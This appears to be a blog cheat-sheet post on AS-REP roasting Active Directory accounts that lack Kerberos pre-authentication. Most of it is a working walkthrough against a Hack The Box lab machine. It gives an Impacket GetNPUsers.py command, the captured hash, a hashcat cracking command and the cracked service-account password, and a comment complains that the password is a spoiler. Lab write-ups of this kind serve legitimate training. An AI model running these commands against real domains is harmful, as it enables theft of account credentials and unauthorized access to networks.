ASREPRoast -
If a domain user does not have Kerberos pre-authentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
Prerequisite:
- Accounts have to have DONT_REQ_PREAUTH
# check ASREPRoast for a list of users (no credentials required) python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
Example -
python /usr/share/doc/python3-impacket/examples/GetNPUsers.py htb.local/ -usersfile service-account -format hashcat -outputfile htb-forest -no-pass -dc-ip 10.10.10.161
cat htb-forest
$krb5asrep$23$svc-alfresco@HTB.LOCAL:3c1d3db1b2da65d232cc7c374d1ff8c0$903b23c1c8778717bb941a35fd68e4f58ba93e46ce1206ac6e834d34409bcb32a2e720bf561ed39d26005898d3869b25d2389f71aa82665dbb950d8412ad034cc58223a317734786b71132267f1cca966cf445776554fdebefeeeb5af65543b3058706cacd985aa07705486413a4943d1183fd32fcb72fe3d78b017d03ed44910e5175db9237b2b0a95334b7013c426c5da367c3f83f0a969a45ff889458f662140d7a8d57c64b943016ebd328351092b288f6627d38269d9824796266c0c8deb6ac0053eb438304d9983490f7557df7690bc25b0c8ad9fec323337e91cf1900b98bade2ca5b
Now crack the hash with hashcat:
# crack AS_REP messages root@kali:impacket-examples$ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
Password Cracked!
$krb5asrep$23$svc-alfresco@HTB.LOCAL:3c1d3db1b2da65d232cc7c374d1ff8c0$903b23c1c8778717bb941a35fd68e4f58ba93e46ce1206ac6e834d34409bcb32a2e720bf561ed39d26005898d3869b25d2389f71aa82665dbb950d8412ad034cc58223a317734786b71132267f1cca966cf445776554fdebefeeeb5af65543b3058706cacd985aa07705486413a4943d1183fd32fcb72fe3d78b017d03ed44910e5175db9237b2b0a95334b7013c426c5da367c3f83f0a969a45ff889458f662140d7a8d57c64b943016ebd328351092b288f6627d38269d9824796266c0c8deb6ac0053eb438304d9983490f7557df7690bc25b0c8ad9fec323337e91cf1900b98bade2ca5b:s3rvice
please censor the HTB password, it's a spoiler
ReplyDelete